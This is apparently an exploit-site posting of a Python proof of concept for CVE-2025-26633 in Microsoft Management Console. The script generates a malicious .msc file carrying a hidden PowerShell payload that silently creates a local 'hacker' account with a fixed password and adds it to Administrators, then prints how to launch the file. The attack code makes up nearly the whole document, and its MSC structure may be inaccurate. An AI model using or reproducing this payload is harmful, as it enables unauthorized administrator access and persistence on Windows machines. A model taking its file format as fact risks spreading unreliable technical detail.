Microsoft MMC MSC EvilTwin Exploit, Local Admin CreationGo BackDownload

#!/usr/bin/env python3
# Exploit Title: Microsoft MMC MSC EvilTwin - Local Admin Creation
# Date: 2025-11-22
# Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# GitHub: https://github.com/mbanyamer
# Vendor Homepage: https://www.microsoft.com
# Software Link: N/A (built-in Windows component - mmc.exe)
# Version: Windows 10 all editions, Windows 11 all editions, Windows Server 2016-2025
# Tested on: Windows 11 24H2 (unpatched), Windows 10 22H2 (unpatched)
# CVE: CVE-2025-26633
# CVSS: 7.8 (High) - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
# Category: Local
# Platform: Windows
# CRITICAL: This is a post-exploitation / living-off-the-land technique widely used in real attacks
# Including: Zero-day at time of disclosure (March 2025), actively exploited by Water Gamayun APT
# Impact: Arbitrary code execution with the privileges of the user opening the .msc file
# Fix: Apply Microsoft Patch Tuesday March 2025 updates (e.g., KB5053602 and later)
# Advisory: https://www.zerodayinitiative.com/advisories/ZDI-25-25-150/
# Patch: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-26633
# Target: Unpatched Windows systems (pre March 2025 patches)

# CVE-2025-26633 Proof of Concept – Add Local Administrator Account
# Use ONLY in authorized penetration testing or isolated research labs

import os
import xml.etree.ElementTree as ET

# PAYLOAD: Adds local administrator account "hacker" silently
PAYLOAD = (
    'powershell.exe -NoP -W Hidden -C "'
    '$user = \\\'hacker\\\'; '
    '$pass = ConvertTo-SecureString \\\'P@ssw0rd123!\\\' -AsPlainText -Force; '
    'New-LocalUser -Name $user -Password $pass -FullName \\\'Lab User\\\' '
    '-Description \\\'Research account\\\' -ErrorAction SilentlyContinue; '
    'Add-LocalGroupMember -Group \\\'Administrators\\\' -Member $user '
    '-ErrorAction SilentlyContinue; '
    'Write-Host \\\'[+] User hacker:P@ssw0rd123! added to Administrators\\\'"'
)

def create_evil_msc(filename="CVE-2025-26633-AddAdmin.msc"):
    root = ET.Element("MMC_ConsoleFile", ConsoleVersion="3.0")

    string_table = ET.SubElement(root, "StringTable")
    ET.SubElement(string_table, "String", id="1").text = "Local Users and Groups"
    ET.SubElement(string_table, "String", id="2").text = "Security Research Snap-in"

    snapins = ET.SubElement(root, "SnapIns")
    snapin = ET.SubElement(snapins, "SnapIn")

    ET.SubElement(snapin, "Name").text = "{7B8B9A1C-2D3E-4F5A-9B6C-1A2B3C4D5E6F}"
    ET.SubElement(snapin, "Description").text = "Custom Administration Tool"

    actions = ET.SubElement(snapin, "Actions")
    action = ET.SubElement(actions, "Action")
    ET.SubElement(action, "RunCommand").text = PAYLOAD
    ET.SubElement(action, "Name").text = "AddLocalAdmin"

    tree = ET.ElementTree(root)
    tree.write(filename, encoding="utf-16", xml_declaration=True)
    print(f"[+] Malicious .msc file successfully created: {filename}")

def main():
    msc_file = "CVE-2025-26633-AddAdmin.msc"
    create_evil_msc(msc_file)

    print("\n[+] Next step (execute inside vulnerable target or lab VM):")
    print(f"    mmc.exe \"{os.path.abspath(msc_file)}\"\n")
    print("[!] Instant local admin account will be created:")
    print("    Username : hacker")
    print("    Password : P@ssw0rd123!")
    print("    Verify with: net localgroup administrators")

if __name__ == "__main__":
    main()